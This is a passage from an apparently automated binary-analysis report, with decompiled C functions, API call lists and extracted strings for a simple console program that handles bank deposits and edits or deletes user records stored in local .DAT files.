                                                • _wprintf.LIBCMT ref: 01232381
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012323B4
                                                • _wprintf.LIBCMT ref: 0123241F
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 0123262D
                                                  • Part of subcall function 012325C0: _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 012325C0: _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012323CA
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                • _wprintf.LIBCMT ref: 01232444
                                                • _wprintf.LIBCMT ref: 0123245A
                                                • _wprintf.LIBCMT ref: 01232470
                                                • _wprintf.LIBCMT ref: 01232486
                                                • _wprintf.LIBCMT ref: 0123249C
                                                • _wprintf.LIBCMT ref: 012324CA
                                                • _wprintf.LIBCMT ref: 012324E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                • 1. Add User, xrefs: 0123243F
                                                • Enter User name : , xrefs: 01232355
                                                • Press a number between the range [1 -5] , xrefs: 012324DD
                                                • 4. View User Log, xrefs: 01232481
                                                • 5. Exit, xrefs: 01232497
                                                • Only THREE attempts shall be allowed to enter username and password., xrefs: 01232332
                                                • 3. Edit User name / Password, xrefs: 0123246B
                                                • N, xrefs: 012324BF
                                                • Password : , xrefs: 0123237C
                                                • Press any key to exit the program..., xrefs: 012323C5
                                                • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 01232573
                                                • IOE, xrefs: 012323EE
                                                • Press ENTER to return to main menu..., xrefs: 01232589
                                                • ADMIN, xrefs: 012323D9
                                                • 2. Delete User, xrefs: 01232455
                                                • Are you sure you want to exit? <Y/N> : , xrefs: 0123253D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                                • API String ID: 3691436685-2046970424
                                                • Opcode ID: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction ID: 335ee4b4e6891386224e9030417996e0f76fe1bac988ca1193f5b19f2aa8cef2
                                                • Opcode Fuzzy Hash: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction Fuzzy Hash: EA6164F1EB4307A6EB19BBF49D03BBE76715FE1B10F004124EA05792C0E9F162588667
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01234640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v280;
                                                				char _v360;
                                                				char _v440;
                                                				void* __ebp;
                                                				void* _t57;
                                                				char _t73;
                                                				intOrPtr _t75;
                                                				void* _t80;
                                                				intOrPtr _t81;
                                                				intOrPtr _t86;
                                                				void* _t93;
                                                				intOrPtr _t103;
                                                				intOrPtr _t113;
                                                				intOrPtr _t114;
                                                				intOrPtr _t129;
                                                				intOrPtr _t134;
                                                				void* _t137;
                                                				void* _t141;
                                                				void* _t151;
                                                				void* _t153;
                                                				void* _t154;
                                                				void* _t163;
                                                
                                                				_t170 = __fp0;
                                                				_t168 = __eflags;
                                                				_t136 = __esi;
                                                				_t135 = __edi;
                                                				_t101 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Deposit to A/C number            : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t103 =  *0x1252f28; // 0x0
                                                				_push(_t103);
                                                				E01236DB6(__ebx, _t135, _t136, _t168);
                                                				_t141 = _t137 + 0x18;
                                                				_t169 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t103, _t135, _t136, _t169, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(_t101, _t135, _t136, _t169);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v244);
                                                				_push("[ %s ]");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Deposited (in NRs.) : ");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				E012320E0(_t103, _t135, _t136, __eflags, __fp0);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t57 = E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t57,  &_v280);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v244);
                                                				_push( &_v28);
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
                                                				E01238140( &_v360,  &_v440);
                                                				E01238140( &_v360, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v360) >> 1), 0xe);
                                                				_push( &_v360);
                                                				E01237229(_t101, _t135, _t136, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				_t151 = _t141 + 0x24 - 8 + 0x1c;
                                                				_t73 = _v5;
                                                				__eflags = _t73 - 0x59;
                                                				if(_t73 == 0x59) {
                                                					L4:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t75 = E01236EF1("TEMP.DAT", "a");
                                                					_t153 = _t151 + 0x10;
                                                					 *0x1252f24 = _t75;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t129 =  *0x1252f28; // 0x0
                                                						_t80 = E01237021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t154 = _t153 + 0x38;
                                                						__eflags = _t80 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t93 = E01238230( &_v208,  &_v28);
                                                						_t163 = _t154 + 8;
                                                						__eflags = _t93;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("addss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t134 =  *0x1252f24; // 0x0
                                                						_push(_t134);
                                                						E01236F06(_t101, _t135, _t136, __eflags);
                                                						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t81 =  *0x1252f24; // 0x0
                                                					_push(_t81);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					_t113 =  *0x1252f28; // 0x0
                                                					_push(_t113);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Deposited");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t86 =  *0x1252f28; // 0x0
                                                					_push(_t86);
                                                					E01236F06(_t101, _t135, _t136, __eflags);
                                                					_t114 =  *0x1252f28; // 0x0
                                                					_push(_t114);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					E012320E0(_t114, _t135, _t136, __eflags, _t170);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t101, _t135, _t136, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L4;
                                                				}
                                                				return _t73;
                                                			}


                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234663
                                                • _wscanf.LIBCMT ref: 01234674
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 012346BB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012346DD
                                                • _wprintf.LIBCMT ref: 012346F3
                                                • _wscanf.LIBCMT ref: 01234704
                                                • _wprintf.LIBCMT ref: 0123471F
                                                • _wprintf.LIBCMT ref: 0123475A
                                                • _wprintf.LIBCMT ref: 012347E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • Transaction completed successfully!, xrefs: 012349C4
                                                • ACCOUNT.DAT, xrefs: 01234805
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0123486A
                                                • %s to be deposited in A/C number : %s [ %s ], xrefs: 01234755
                                                • ACCOUNT.DAT, xrefs: 01234681
                                                • Deposit to A/C number : , xrefs: 0123465E
                                                • Confirm Transaction, xrefs: 0123471A
                                                • TEMP.DAT, xrefs: 0123481C
                                                • TRANSACTION.DAT, xrefs: 01234950
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012347DD
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234915
                                                • [ %s ], xrefs: 012346D8
                                                • Amount to be Deposited (in NRs.) : , xrefs: 012346EE
                                                • Given A/C number does not exits!, xrefs: 012346B6
                                                • %s %s %s %s %.2f %s, xrefs: 01234994
                                                • Cash+Deposited, xrefs: 0123498B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                                • API String ID: 532294799-930819241
                                                • Opcode ID: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction ID: f0d91d520195e11ca8cb4939e558e55eddc5d4bdbc70a094af231fb1ae6ee06c
                                                • Opcode Fuzzy Hash: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction Fuzzy Hash: 1C91B7F2D3030ABBDB15FBA09C82EEE77785FA5700F004259F90575180FA7166988BB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E01232B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v48;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v83;
                                                				char _v87;
                                                				char _v91;
                                                				char _v95;
                                                				char _v99;
                                                				char _v103;
                                                				char _v107;
                                                				char _v111;
                                                				char _v112;
                                                				char _v144;
                                                				char _v176;
                                                				char _v208;
                                                				void* __ebp;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				void* _t68;
                                                				intOrPtr _t84;
                                                				intOrPtr _t86;
                                                				intOrPtr _t87;
                                                				void* _t88;
                                                				intOrPtr _t89;
                                                				intOrPtr _t95;
                                                				intOrPtr _t98;
                                                				intOrPtr _t105;
                                                				char _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                				intOrPtr _t119;
                                                				intOrPtr _t130;
                                                				intOrPtr _t132;
                                                				void* _t136;
                                                				void* _t140;
                                                				void* _t141;
                                                				void* _t142;
                                                				void* _t143;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t154;
                                                
                                                				_t161 = __fp0;
                                                				_t135 = __esi;
                                                				_t134 = __edi;
                                                				_t113 = __ebx;
                                                				_v48 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v112 = 0;
                                                				_v111 = 0;
                                                				_v107 = 0;
                                                				_v103 = 0;
                                                				_v99 = 0;
                                                				_v95 = 0;
                                                				_v91 = 0;
                                                				_v87 = 0;
                                                				_v83 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v16 = 0;
                                                				_v12 = 0;
                                                				E012320E0(0, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t134, _t135,  &_v112);
                                                				_t66 = E01236EF1("USER.DAT", "r");
                                                				_t140 = _t136 + 0x18;
                                                				 *0x1252f28 = _t66;
                                                				while(1) {
                                                					_push( &_v144);
                                                					_push( &_v176);
                                                					_t67 =  *0x1252f28; // 0x0
                                                					_t68 = E01237021(_t67, "%s %s %s\n", 0x1252ee0);
                                                					_t141 = _t140 + 0x14;
                                                					if(_t68 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t109 = E01238230(0x1252ee4,  &_v176);
                                                					_t140 = _t141 + 8;
                                                					if(_t109 == 0) {
                                                						_t110 = E01238230(0x1252f02,  &_v144);
                                                						_t140 = _t140 + 8;
                                                						if(_t110 == 0) {
                                                							_v16 = _v16 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t116 =  *0x1252f28; // 0x0
                                                				_push(_t116);
                                                				E01236DB6(_t113, _t134, _t135, __eflags);
                                                				_t142 = _t141 + 4;
                                                				E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                				__eflags = _v16;
                                                				if(__eflags != 0) {
                                                					E012312B0(8, 0xa);
                                                					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
                                                					E0123715C(_t113, _t134, _t135, __eflags);
                                                					_t143 = _t142 + 4;
                                                					__eflags = _v5 - 0x59;
                                                					if(__eflags == 0) {
                                                						do {
                                                							L10:
                                                							E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                							_v12 = 0;
                                                							E012312B0(0x19, 8);
                                                							_push("NEW User Name        : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E0123738B("%s",  &_v208);
                                                							E012312B0(0x19, 0xa);
                                                							_push("NEW Password         : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v48);
                                                							E012312B0(0x19, 0xc);
                                                							_push("Confirm NEW Password : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v80);
                                                							_t116 =  &_v80;
                                                							_t84 = E01238230( &_v48,  &_v80);
                                                							_t143 = _t143 + 0x1c;
                                                							__eflags = _t84;
                                                							if(__eflags != 0) {
                                                								E012320E0( &_v80, _t134, _t135, __eflags, _t161);
                                                								E012312B0(0xa, 0xa);
                                                								_push(0x124f710);
                                                								E0123715C(_t113, _t134, _t135, __eflags);
                                                								_t143 = _t143 + 4;
                                                								_t105 = _v12 + 1;
                                                								__eflags = _t105;
                                                								_v12 = _t105;
                                                							}
                                                							__eflags = _v12;
                                                						} while (__eflags != 0);
                                                						 *0x1252f28 = E01236EF1("USER.DAT", 0x124f740);
                                                						_t86 = E01236EF1("temp.dat", "a");
                                                						_t149 = _t143 + 0x10;
                                                						 *0x1252f20 = _t86;
                                                						while(1) {
                                                							_push( &_v144);
                                                							_push( &_v176);
                                                							_t87 =  *0x1252f28; // 0x0
                                                							_t88 = E01237021(_t87, "%s %s %s\n", 0x1252ee0);
                                                							_t150 = _t149 + 0x14;
                                                							__eflags = _t88 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t95 = E01238230(0x1252ee4,  &_v176);
                                                							_t154 = _t150 + 8;
                                                							__eflags = _t95;
                                                							if(__eflags != 0) {
                                                								L17:
                                                								_push( &_v144);
                                                								_push( &_v176);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t130 =  *0x1252f20; // 0x0
                                                								_push(_t130);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								L19:
                                                								continue;
                                                							}
                                                							_t98 = E01238230(0x1252f02,  &_v144);
                                                							_t154 = _t154 + 8;
                                                							__eflags = _t98;
                                                							if(__eflags == 0) {
                                                								_push( &_v48);
                                                								_push( &_v208);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t132 =  *0x1252f20; // 0x0
                                                								_push(_t132);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								goto L19;
                                                							}
                                                							goto L17;
                                                						}
                                                						_t89 =  *0x1252f28; // 0x0
                                                						_push(_t89);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						_t119 =  *0x1252f20; // 0x0
                                                						_push(_t119);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						E012320E0(_t119, _t134, _t135, __eflags, _t161);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record has been EDITED successfully!");
                                                						return E0123715C(_t113, _t134, _t135, __eflags);
                                                					}
                                                					_t106 = _v5;
                                                					__eflags = _t106 - 0x79;
                                                					if(__eflags != 0) {
                                                						return _t106;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f640);
                                                				return E0123715C(_t113, _t134, _t135, __eflags);
                                                			}































































                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232B94
                                                • _wscanf.LIBCMT ref: 01232BA6
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232BBC
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232C02
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232C72
                                                • _wprintf.LIBCMT ref: 01232C8D
                                                • _wprintf.LIBCMT ref: 01232CC5
                                                • _wscanf.LIBCMT ref: 01232CD9
                                                • _wprintf.LIBCMT ref: 01232CEF
                                                • _wprintf.LIBCMT ref: 01232D0E
                                                • _wprintf.LIBCMT ref: 01232D46
                                                • _swscanf.LIBCMT ref: 01232DAD
                                                • _fprintf.LIBCMT ref: 01232E0D
                                                • _fprintf.LIBCMT ref: 01232E33
                                                • _wprintf.LIBCMT ref: 01232E70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                                • API String ID: 1431756120-371646773
                                                • Opcode ID: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction ID: fcc9a805462d712e36d20f9da7b5c517cc61060683e2cd0e342f5b7ae423bcdf
                                                • Opcode Fuzzy Hash: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction Fuzzy Hash: C181A7F1D70306EFEF15EBE9DD42FAD76746BB5700F008169E505B6280E670A2188B76
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E01232800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				char _v20;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v52;
                                                				char _v84;
                                                				char _v116;
                                                				char _v129;
                                                				char _v139;
                                                				char _v154;
                                                				char _v188;
                                                				void* __ebp;
                                                				intOrPtr _t47;
                                                				void* _t49;
                                                				char _t54;
                                                				intOrPtr _t56;
                                                				void* _t58;
                                                				intOrPtr _t62;
                                                				void* _t65;
                                                				intOrPtr _t67;
                                                				intOrPtr _t75;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				intOrPtr _t83;
                                                				void* _t86;
                                                				void* _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                				intOrPtr _t96;
                                                				intOrPtr _t99;
                                                				intOrPtr _t105;
                                                				intOrPtr _t107;
                                                				intOrPtr _t109;
                                                				void* _t118;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t124;
                                                				void* _t125;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t132;
                                                				void* _t133;
                                                				void* _t139;
                                                
                                                				_t146 = __fp0;
                                                				_t117 = __esi;
                                                				_t116 = __edi;
                                                				_t89 = __ebx;
                                                				_v52 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v12 = 0;
                                                				E012320E0(__ecx, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t116, _t117,  &_v52);
                                                				_t47 = E01236EF1("USER.DAT", "r");
                                                				_t122 = _t118 + 0x18;
                                                				 *0x1252f28 = _t47;
                                                				while(1) {
                                                					_push( &_v116);
                                                					_push( &_v84);
                                                					_t92 =  *0x1252f28; // 0x0
                                                					_t49 = E01237021(_t92, "%s %s %s\n", 0x1252ee0);
                                                					_t123 = _t122 + 0x14;
                                                					if(_t49 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t86 = E01238230(0x1252ee4,  &_v84);
                                                					_t122 = _t123 + 8;
                                                					if(_t86 == 0) {
                                                						_t88 = E01238230(0x1252f02,  &_v116);
                                                						_t122 = _t122 + 8;
                                                						if(_t88 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t105 =  *0x1252f28; // 0x0
                                                				_push(_t105);
                                                				E01236DB6(_t89, _t116, _t117, __eflags);
                                                				_t124 = _t123 + 4;
                                                				E012320E0(_t92, _t116, _t117, __eflags, _t146);
                                                				__eflags = _v12;
                                                				if(__eflags != 0) {
                                                					E012312B0(0xf, 0xa);
                                                					_push("Are you sure you want to DELETE this user? <Y/N> : ");
                                                					E0123715C(_t89, _t116, _t117, __eflags);
                                                					_t125 = _t124 + 4;
                                                					_t54 = _v5;
                                                					__eflags = _t54 - 0x59;
